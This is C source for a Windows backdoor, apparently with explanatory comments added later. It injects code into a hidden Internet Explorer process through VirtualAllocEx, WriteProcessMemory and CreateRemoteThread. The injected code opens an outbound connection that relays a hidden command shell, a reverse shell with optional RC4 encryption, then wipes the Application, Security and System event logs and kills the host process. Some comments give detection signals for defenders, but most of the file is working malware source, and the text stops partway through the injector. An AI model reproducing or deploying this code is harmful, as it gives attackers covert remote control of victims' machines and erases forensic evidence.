// WRp->pMBox= (tMBox)WRp->pGetProcAddress(WRp->husr32,WRp->szMessageBoxA );
//WRp->pMBox(0,WRp->szLocalPassword,WRp->szLocalPassword,MB_OK);
WRp->precv=(trecv)WRp->pGetProcAddress(WRp->hwinsock, WRp->szrecv );
WRp->pWriteFile=(tWriteFile)WRp->pGetProcAddress(WRp->hk32, WRp->szWriteFile );
// WRp->plstrcmpi=(tlstrcmpi)WRp->pGetProcAddress(WRp->hk32, WRp->szlstrcmpi );
WRp->pExitThread=(tExitThread)WRp->pGetProcAddress(WRp->hk32, WRp->szExitThread );
// WRp->pMBox(0,WRp->szWs232,WRp->szWs232,MB_OK);
if((WRp->pExitThread==0)||(WRp->pWriteFile==0)||(WRp->precv==0))
return 1;
//WRp->hAdvapi =WRp->pLoadLibrary( WRp->szAdvapi32);
WRp->pCryptAcquireContext=(tCryptAcquireContext)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptAcquireContext);
WRp->pCryptCreateHash=(tCryptCreateHash)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptCreateHash);
WRp->pCryptHashData=(tCryptHashData)WRp->pGetProcAddress( WRp->hAdvapi,WRp->szCryptHashData);
WRp->pCryptDeriveKey=(tCryptDeriveKey)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptDeriveKey);
WRp->pCryptDecrypt=(tCryptDecrypt)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptDecrypt);
WRp->pCryptDestroyKey=(tCryptDestroyKey)WRp->pGetProcAddress( WRp->hAdvapi,WRp->szCryptDestroyKey);
WRp->pCryptDestroyHash=(tCryptDestroyHash)WRp->pGetProcAddress(WRp->hAdvapi,WRp->szCryptDestroyHash);
WRp->pCryptReleaseContext=(tCryptReleaseContext)WRp->pGetProcAddress( WRp->hAdvapi,WRp->szCryptReleaseContext);
WRp->plstrlen=(tlstrlen)WRp->pGetProcAddress(WRp->hk32,WRp->szlstrlen);
/////////////////
while (1)
{
//WRp->pMBox(0,WRp->szLocalPassword,WRp->szLocalPassword,MB_OK);
WRp->RcvCnt=WRp->precv(WRp->Session->ClientSocket, (char *)WRp->Buff, sizeof(WRp->Buff), 0);
//if((WRp->RcvCnt==0)||(WRp->RcvCnt==SOCKET_ERROR)) break;
//if((WRp->RcvCnt==0)) break;
if(WRp->Encrypt){
//decr start
if (WRp->pCryptAcquireContext(&WRp->hProv, NULL,WRp->CSP, PROV_RSA_FULL, 0))
{
if (WRp->pCryptCreateHash(WRp->hProv, CALG_MD5, 0, 0, &WRp->hHash))
{
WRp->dwLength =WRp->plstrlen(WRp->szLocalPassword);
// WRp->pMBox(0,WRp->szLocalPassword,WRp->szLocalPassword,MB_OK);
if (WRp->pCryptHashData(WRp->hHash, (BYTE *)WRp->szLocalPassword, WRp->dwLength, 0))
{
// WRp->pMBox(0,echoreg->cData,echoreg->cData,MB_OK);
if (WRp->pCryptDeriveKey(WRp->hProv, CALG_RC4, WRp->hHash, CRYPT_EXPORTABLE, &WRp->hKey))
{
WRp->dwLength =WRp->RcvCnt;
WRp->pCryptDecrypt(WRp->hKey, 0, TRUE, 0, (BYTE *)WRp->Buff,&WRp->dwLength);
WRp->pCryptDestroyKey(WRp->hKey);
//WRp->pMBox(0,WRp->Buff,WRp->Buff,MB_OK);
}
}
WRp->pCryptDestroyHash(WRp->hHash);
}
WRp->pCryptReleaseContext(WRp->hProv, 0);
}//decr end
}
WRp->dwLength=WRp->RcvCnt;
//WRp->pMBox(0,(char *)WRp->Buff,(char *)WRp->Buff,MB_OK);
if (! WRp->pWriteFile(WRp->Session->WritePipeHandle,WRp->Buff ,WRp->dwLength ,&WRp->BytesWritten, NULL))
{
// WRp->pMBox(0,(char *)WRp->Buff,(char *)WRp->Buff,MB_OK);
break;
}
//if (WRp->plstrcmpi(WRp->Buffer, "exit\r\n") == 0) WRp->pExitThread(0);
}
WRp->pExitThread(0);
return 0;
}
// Empty marker function placed directly after the write-shell thread body above.
// The injecting side (IStartInjectIEThread, further down) copies
// iISessionWriteShellThreadsize bytes starting at its local copy of that thread
// into the target process, so this marker most likely exists to let that size be
// derived from adjacent function addresses — TODO confirm where the size is
// computed (not visible here). If so, it depends on the compiler keeping
// functions in source order without reordering or inlining, which optimizing
// builds do not guarantee; the preceding body must stay self-contained (no
// direct calls, no string literals) for the copied bytes to run elsewhere.
static void EndISessionWriteShellThread(void)
{
}
/*
 * IConnectThread — thread body intended to run inside another process.
 *
 * Everything it needs (library names, API names, the target host/port, the
 * shell command line, the two relay-thread entry points and their parameter
 * blocks) arrives through *Cp, and every Windows API is reached through a
 * function pointer resolved here with Cp->pGetProcAddress. Nothing in the
 * body references the import table or a string literal, which is what lets
 * the injector (IStartInjectIEThread, below) copy the raw bytes of this
 * function with WriteProcessMemory and start them with CreateRemoteThread.
 *
 * Observable sequence (all grounded in the lines below):
 *   1. LoadLibrary of ws2_32 / kernel32 / advapi32 by name.
 *   2. Resolution of socket, pipe, process, thread and event-log APIs.
 *   3. WSAStartup, socket(), gethostbyname(Cp->host), connect() to Cp->port.
 *   4. On success: two anonymous pipes, a hidden-window child started from
 *      Cp->szcmdexe with stdin/stdout/stderr bound to those pipes, and two
 *      relay threads (one direction each) between the socket and the pipes.
 *   5. Wait until either relay thread or the child exits, then tear down.
 *   6. ClearEventLog on the logs named by szApplications, szSecu, szSystem.
 *   7. ExitProcess(0) — ends the entire hosting process, not just this thread.
 *
 * Defender notes: the network connection is made by whatever process hosts
 * this code, with a child created from Cp->szcmdexe whose std handles are
 * pipes (Sysmon event 1 / 4688 with a console child of a non-console parent
 * is the usual signal). Clearing the Security log is itself recorded as
 * Security event 1102, and clearing System/Application as System event 104,
 * so the cleanup in step 6 leaves a trace of its own. The final ExitProcess
 * also makes the host process disappear abruptly after the session.
 *
 * Return: 1 when a library or API could not be resolved (before any network
 * activity), 0 if a relay thread could not be created; otherwise ExitProcess
 * runs and the trailing return 0 is never reached.
 */
DWORD WINAPI IConnectThread(ConnectParam *Cp)
{
// Cp->husr32 = Cp->pLoadLibrary(Cp->szuser32dll);
// Step 1: load the three libraries by the names carried in *Cp.
Cp->hwinsock = Cp->pLoadLibrary(Cp->szWs232 );
Cp->hk32 =Cp->pLoadLibrary( Cp->szkernel32dll);
Cp->hAdvapi =Cp->pLoadLibrary( Cp->szAdvapi32);
if((Cp->hAdvapi==0)||(Cp->hk32==0)||(Cp->hk32==0)) return 1;
// Cp->pMBox= (tMBox)Cp->pGetProcAddress(Cp->husr32,Cp->szMessageBoxA );
// Step 2a: winsock entry points (resolved by name, never imported).
Cp->pWSAStartup=(tWSAStartup)Cp->pGetProcAddress( Cp->hwinsock, Cp->szWSAStartup);
Cp->psocket=(tsocket)Cp->pGetProcAddress(Cp->hwinsock, Cp->szsocket );
Cp->pgethostbyname=(tgethostbyname)Cp->pGetProcAddress(Cp->hwinsock, Cp->szgethostbyname );
Cp->pconnect=(tconnect)Cp->pGetProcAddress(Cp->hwinsock, Cp->szconnect );
Cp->phtons=(thtons)Cp->pGetProcAddress(Cp->hwinsock, Cp->szhtons );
Cp->pinet_addr=(tinet_addr)Cp->pGetProcAddress(Cp->hwinsock, Cp->szinet_addr );
//cmd
// Step 2b: kernel32 entry points for the pipe/process/thread plumbing.
Cp->pclosesocket=(tclosesocket)Cp->pGetProcAddress(Cp->hwinsock, Cp->szclosesocket );
Cp->pCreatePipe=(tCreatePipe)Cp->pGetProcAddress(Cp->hk32, Cp->szCreatePipe );
Cp->pDuplicateHandle=(tDuplicateHandle)Cp->pGetProcAddress(Cp->hk32, Cp->szDuplicateHandle );
Cp->pCreateProcess=(tCreateProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szCreateProcess );
Cp->pCreatePipe=(tCreatePipe)Cp->pGetProcAddress(Cp->hk32, Cp->szCreatePipe );
Cp->pCloseHandle=(tCloseHandle)Cp->pGetProcAddress(Cp->hk32, Cp->szCloseHandle );
Cp->pCreateThread=(tCreateThread)Cp->pGetProcAddress(Cp->hk32, Cp->szCreateThread );
Cp->pWaitForMultipleObjects=(tWaitForMultipleObjects)Cp->pGetProcAddress(Cp->hk32, Cp->szWaitForMultipleObjects);
Cp->pTerminateThread=(tTerminateThread)Cp->pGetProcAddress(Cp->hk32, Cp->szTerminateThread );
Cp->pTerminateProcess=(tTerminateProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szTerminateProcess );
Cp->pDisconnectNamedPipe=(tDisconnectNamedPipe)Cp->pGetProcAddress(Cp->hk32, Cp->szDisconnectNamedPipe );
Cp->pGetCurrentProcess=(tGetCurrentProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szGetCurrentProcess );
// Cp->pPostQuitMessage=(tPostQuitMessage)Cp->pGetProcAddress(Cp->husr32, Cp->szPostQuitMessage);
Cp->pExitProcess=(tExitProcess)Cp->pGetProcAddress(Cp->hk32, Cp->szExitProcess);
if((Cp->pCreateProcess==0)||(Cp->pclosesocket==0)||(Cp->pCreatePipe==0)||(Cp->pDuplicateHandle==0)||(Cp->pDisconnectNamedPipe==0)||(Cp->pTerminateProcess==0))
return 1;
if((Cp->pCreatePipe==0)||(Cp->pCloseHandle==0)||(Cp->pCreateThread==0)||(Cp->pWaitForMultipleObjects==0)||(Cp->pTerminateThread==0))
return 1;
if((Cp->pWSAStartup==0)||(Cp->phtons==0)||(Cp->pconnect==0)||(Cp->pgethostbyname==0)||(Cp->psocket==0))
return 1;
// Step 2c: advapi32 event-log APIs, used only in the cleanup at the end.
Cp->pRegisterEventSource=(tRegisterEventSource)Cp->pGetProcAddress(Cp->hAdvapi, Cp->szRegisterEventSource);
Cp->pClearEventLog=(tClearEventLog)Cp->pGetProcAddress(Cp->hAdvapi, Cp->szClearEventLog);
Cp->pDeregisterEventSource=(tDeregisterEventSource)Cp->pGetProcAddress(Cp->hAdvapi, Cp->szDeregisterEventSource);
if((Cp->pClearEventLog==0)) return 1;
if((Cp->pRegisterEventSource==0)) return 1;
if((Cp->pDeregisterEventSource==0)) return 1;
//Cp->pMBox(0,Cp->host,Cp->szcmdexe,MB_OK);
/////////////////
//Cp->pMBox(0,Cp->host,Cp->szcmdexe,MB_OK);
// Step 3: outbound TCP connection to Cp->host:Cp->port. The host is
// resolved with gethostbyname and the first address in h_addr_list is used.
Cp->pWSAStartup(MAKEWORD(2,1),&Cp->wsaData);
Cp->client = Cp->psocket(AF_INET, SOCK_STREAM, 0);
Cp->lpHostEntry =Cp->pgethostbyname(Cp->host);
//if(Cp->lpHostEntry==NULL) Cp->pMBox(0,Cp->szconnect,"1",MB_OK);
Cp->local.sin_family=AF_INET;
Cp->local.sin_addr=*((LPIN_ADDR)*(Cp->lpHostEntry->h_addr_list));
//Cp->local.sin_addr.s_addr=Cp->pinet_addr(Cp->host);
Cp->local.sin_port=Cp->phtons((u_short)Cp->port);
if(Cp->pconnect(Cp->client, (SOCKADDR*)&Cp->local, sizeof(Cp->local))==0){
// Cp->pMBox(0,Cp->szconnect,"1",MB_OK);
////////////////////////////////////start shell
// Step 4: inheritable pipes. Session.ReadPipeHandle <- child stdout;
// Session.WritePipeHandle -> child stdin.
Cp->SecurityAttributes.nLength = sizeof(Cp->SecurityAttributes);
Cp->SecurityAttributes.lpSecurityDescriptor = NULL;
Cp->SecurityAttributes.bInheritHandle = TRUE;
Cp->pCreatePipe(&Cp->Session.ReadPipeHandle, &Cp->ShellStdoutPipe, &Cp->SecurityAttributes, 0);
Cp->pCreatePipe(&Cp->ShellStdinPipe, &Cp->Session.WritePipeHandle,&Cp->SecurityAttributes, 0);
Cp->Session.ProcessHandle =NULL;
// Child is started hidden, with std handles redirected to the pipe ends;
// stderr is a duplicate of the stdout pipe end.
Cp->si.cb = sizeof(STARTUPINFO);
Cp->si.lpReserved = NULL;
Cp->si.lpTitle = NULL;
Cp->si.lpDesktop = NULL;
Cp->si.dwX = Cp->si.dwY = Cp->si.dwXSize = Cp->si.dwYSize = 0L;
Cp->si.wShowWindow = SW_HIDE;
Cp->si.lpReserved2 = NULL;
Cp->si.cbReserved2 = 0;
Cp->si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
Cp->si.hStdInput =Cp->ShellStdinPipe;
Cp->si.hStdOutput =Cp->ShellStdoutPipe;
// Cp->pMBox(0,Cp->szDuplicateHandle,"1",MB_OK);
Cp->pDuplicateHandle(Cp->pGetCurrentProcess(), Cp->ShellStdoutPipe,Cp->pGetCurrentProcess(), &Cp->si.hStdError,DUPLICATE_SAME_ACCESS, TRUE, 0);
// bInheritHandles=TRUE so the child receives the pipe ends; only the
// process handle is retained, the primary thread handle is closed at once.
if (Cp->pCreateProcess(NULL, Cp->szcmdexe, NULL, NULL, TRUE, 0, NULL, NULL,&Cp->si, &Cp->ProcessInformation))
{
// Cp->pMBox(0,Cp->szcmdexe,"1",MB_OK);
Cp->Session.ProcessHandle =Cp->ProcessInformation.hProcess;
Cp->pCloseHandle(Cp->ProcessInformation.hThread);
}
//Cp->pMBox(0,Cp->szCreateProcess,Cp->szCreateProcess,MB_OK);
// The child now owns its copies of these ends; drop the parent's.
Cp->pCloseHandle(Cp->ShellStdinPipe);
Cp->pCloseHandle(Cp->ShellStdoutPipe);
Cp->SecurityAttributes.nLength = sizeof(Cp->SecurityAttributes);
Cp->SecurityAttributes.lpSecurityDescriptor = NULL;
Cp->SecurityAttributes.bInheritHandle = FALSE;
// Hand the socket and pipe ends to the two relay threads. Encrypt is
// propagated to both; the write-thread tail visible above shows what it
// means there (an RC4 key derived from an MD5 of szLocalPassword via
// CryptDeriveKey, applied per received buffer). Both param blocks live
// at addresses supplied by the injector (Cp->writeshellpar / preadshellpar).
Cp->Session.ClientSocket =Cp->client;
if(Cp->Encrypt){
Cp->writeshellpar->Encrypt=TRUE;
Cp->preadshellpar->Encrypt=TRUE;
}
else{
Cp->writeshellpar->Encrypt=FALSE;
Cp->preadshellpar->Encrypt=FALSE;
}
Cp->writeshellpar->Session=&Cp->Session;
Cp->preadshellpar->Session=&Cp->Session;
// Entry points are the remote copies written by the injector, so they are
// plain addresses in *Cp rather than symbols.
Cp->Session.WriteShellThreadHandle=Cp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(Cp->pISessionWriteShellThread), (LPVOID) Cp->writeshellpar,0,&Cp->ThreadId);
Cp->Session.ReadShellThreadHandle=Cp->pCreateThread(0,0,(DWORD (WINAPI *)( void *))(Cp->pISessionReadShellThread), (LPVOID)Cp->preadshellpar,0,&Cp->ThreadId);
// NOTE: returns without closing the socket, pipes, child process or the
// one thread that may have been created.
if((Cp->Session.WriteShellThreadHandle==NULL)||(Cp->Session.ReadShellThreadHandle==NULL)) return 0;
//Cp->pMBox(0,Cp->szcmdexe,"1",MB_OK);
// Step 5: block (INFINITE timeout, bWaitAll=FALSE) until any one of the two
// relay threads or the child process ends, then forcibly stop the others.
Cp->HandleArray[0] =Cp->Session.ReadShellThreadHandle;
Cp->HandleArray[1] =Cp->Session.WriteShellThreadHandle;
Cp->HandleArray[2] =Cp->Session.ProcessHandle;
Cp->i =Cp->pWaitForMultipleObjects(3, Cp->HandleArray, FALSE, 0xffffffff);
switch (Cp->i) {
case WAIT_OBJECT_0 + 0:
// Cp->pMBox(0,Cp->szTerminateThread,"1",MB_OK);
Cp->pTerminateThread(Cp->Session.WriteShellThreadHandle, 0);
Cp->pTerminateProcess(Cp->Session.ProcessHandle, 1);
break;
case WAIT_OBJECT_0 + 1:
// Cp->pMBox(0,Cp->szTerminateProcess,"1",MB_OK);
Cp->pTerminateThread(Cp->Session.ReadShellThreadHandle, 0);
Cp->pTerminateProcess(Cp->Session.ProcessHandle, 1);
break;
case WAIT_OBJECT_0 + 2:
// Cp->pMBox(0,Cp->szclosesocket,"1",MB_OK);
Cp->pTerminateThread(Cp->Session.WriteShellThreadHandle, 0);
Cp->pTerminateThread(Cp->Session.ReadShellThreadHandle, 0);
break;
default:
// Cp->pMBox(0,Cp->szDisconnectNamedPipe,"1",MB_OK);
break;
}
// Release the socket, both pipe ends, both thread handles and the child.
Cp->pclosesocket(Cp->Session.ClientSocket);
Cp->pDisconnectNamedPipe(Cp->Session.ReadPipeHandle);
Cp->pCloseHandle(Cp->Session.ReadPipeHandle);
Cp->pDisconnectNamedPipe(Cp->Session.WritePipeHandle);
Cp->pCloseHandle(Cp->Session.WritePipeHandle);
Cp->pCloseHandle(Cp->Session.ReadShellThreadHandle);
Cp->pCloseHandle(Cp->Session.WriteShellThreadHandle);
Cp->pCloseHandle(Cp->Session.ProcessHandle);
//Cp->pMBox(0,Cp->szPostQuitMessage,"1",MB_OK);
//Cp->pPostQuitMessage(0);
//Clearing all Event Logs...
// Step 6: anti-forensic cleanup. Each of the three logs is opened with
// RegisterEventSource, wiped with ClearEventLog(hEvent, NULL) (no backup
// file), and released. Windows records the clear itself: Security event
// 1102 for the Security log, System event 104 for the others — so a
// detection rule on those IDs still catches this step.
Cp->hEvent =Cp->pRegisterEventSource(NULL, Cp->szApplications);
if(Cp->hEvent != NULL)
{
Cp->pClearEventLog(Cp->hEvent, NULL);
Cp->pDeregisterEventSource(Cp->hEvent);
}
Cp->hEvent =Cp->pRegisterEventSource(NULL, Cp->szSecu);
if(Cp->hEvent != NULL){
Cp->pClearEventLog(Cp->hEvent, NULL);
Cp->pDeregisterEventSource(Cp->hEvent);
}
Cp->hEvent =Cp->pRegisterEventSource(NULL, Cp->szSystem);
if(Cp->hEvent != NULL){
Cp->pClearEventLog(Cp->hEvent, NULL);
Cp->pDeregisterEventSource(Cp->hEvent);
}
/////////////////
//return 1;
////////////////////////////////////end shell
}
//else Cp->pMBox(0,Cp->szconnect,Cp->szconnect,MB_OK);
// Step 7: whether or not connect() succeeded, the whole hosting process is
// terminated here; the return below is unreachable in practice.
Cp->pExitProcess(0);
//Cp->pTerminateProcess(Cp->pGetCurrentProcess(),1);
// Cp->pMBox(0,"Cp->szcmdexe","Cp->szconnect",MB_OK);
return 0;
}
// Empty marker function placed directly after IConnectThread. The injector
// (IStartInjectIEThread, below) writes iIConnectThreadsize bytes starting at
// its local copy of IConnectThread into the target process, so this marker
// most likely exists to let that size be derived from adjacent function
// addresses — TODO confirm where iIConnectThreadsize is computed (not
// visible here). If so, it depends on the compiler keeping functions in
// source order without reordering or inlining, which optimizing builds do
// not guarantee.
static void EndIConnectThread(void)
{
}
DWORD WINAPI IStartInjectIEThread(IEParam *IIEp)
{
// IIEp->husr32 = IIEp->pLoadLibrary(IIEp->szuser32dll);
IIEp->hk32 =IIEp->pLoadLibrary( IIEp->szkernel32dll);
// IIEp->pMBox= (tMBox)IIEp->pGetProcAddress(IIEp->husr32,IIEp->szMessageBoxA );
IIEp->pCreateRemoteThread = (tCreateRemoteThread)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szCreateRemoteThread);
IIEp->pWriteProcessMemory=(tWriteProcessMemory)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szWriteProcessMemory );
IIEp->pVirtualAllocEx=(tVirtualAllocEx)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szVirtualAllocEx );
IIEp->pCreateProcess=(tCreateProcess)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szCreateProcess );
IIEp->pOpenProcess=(tOpenProcess)IIEp->pGetProcAddress(IIEp->hk32,IIEp->szOpenProcess);
if(IIEp->pVirtualAllocEx==NULL) return 0;
//IIEp->pMBox(0,IIEp->szCreateProcess ,"IIEp->szconnect",MB_OK);
IIEp->si.cb = sizeof(STARTUPINFO);
IIEp->si.lpReserved = NULL;
IIEp->si.lpTitle = NULL;
IIEp->si.lpDesktop = NULL;
IIEp->si.dwX = IIEp->si.dwY = IIEp->si.dwXSize = IIEp->si.dwYSize = 0L;
IIEp->si.wShowWindow = SW_HIDE;
IIEp->si.lpReserved2 = NULL;
IIEp->si.cbReserved2 = 0;
IIEp->si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
if (!IIEp->pCreateProcess(NULL,IIEp->sziexplorerexe, NULL, NULL, TRUE, 0, NULL, NULL,&IIEp->si, &IIEp->ProcessInformation)) return 0;
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->ie=IIEp->pOpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE,IIEp->ProcessInformation.dwProcessId );
if(IIEp->ie == 0) return 0;
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->pIConnectThread=(tIConnectThread)IIEp->pVirtualAllocEx(IIEp->ie, 0,IIEp->iIConnectThreadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
IIEp->pISessionWriteShellThread=(tISessionWriteShellThread)IIEp->pVirtualAllocEx(IIEp->ie, 0,IIEp->iISessionWriteShellThreadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
IIEp->pISessionReadShellThread=(tISessionReadShellThread)IIEp->pVirtualAllocEx(IIEp->ie, 0,IIEp->iISessionReadShellThreadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->pReadShellTParam = (ReadShellTParam *)IIEp->pVirtualAllocEx(IIEp->ie, 0, sizeof(ConnectParam), MEM_COMMIT, PAGE_READWRITE );
IIEp->pWriteShellTParam = (WriteShellTParam *)IIEp->pVirtualAllocEx(IIEp->ie, 0, sizeof(WriteShellTParam), MEM_COMMIT, PAGE_READWRITE );
IIEp->pConnectParam = (ConnectParam *)IIEp->pVirtualAllocEx(IIEp->ie, 0, sizeof(ReadShellTParam), MEM_COMMIT, PAGE_READWRITE );
//IIEp->pMBox(0,IIEp->szVirtualAllocEx ,"IIEp->szconnect",MB_OK);
IIEp->lclpConnectParam->pISessionWriteShellThread=IIEp->pISessionWriteShellThread;
IIEp->lclpConnectParam->writeshellpar =IIEp->pWriteShellTParam;
IIEp->lclpConnectParam->pISessionReadShellThread=IIEp->pISessionReadShellThread;
IIEp->lclpConnectParam->preadshellpar=IIEp->pReadShellTParam;
if (!IIEp->pWriteProcessMemory(IIEp->ie,IIEp->pIConnectThread,IIEp->plclIConnectThread , IIEp->iIConnectThreadsize, 0 ) )return 0;
if (!IIEp->pWriteProcessMemory(IIEp->ie,IIEp->pISessionWriteShellThread,IIEp->plclISessionWriteShellThread, IIEp->iISessionWriteShellThreadsize, 0 ) )return 0;
if (!IIEp->pWriteProcessMemory(IIEp->ie,IIEp->pISessionReadShellThread,IIEp->plclISessionReadShellThread, IIEp->iISessionReadShellThreadsize, 0 ) )return 0;
if (!IIEp->pWriteProcessMemory(IIEp->ie, IIEp->pConnectParam,IIEp->lclpConnectParam,sizeof(ConnectParam), 0 ) )return 0;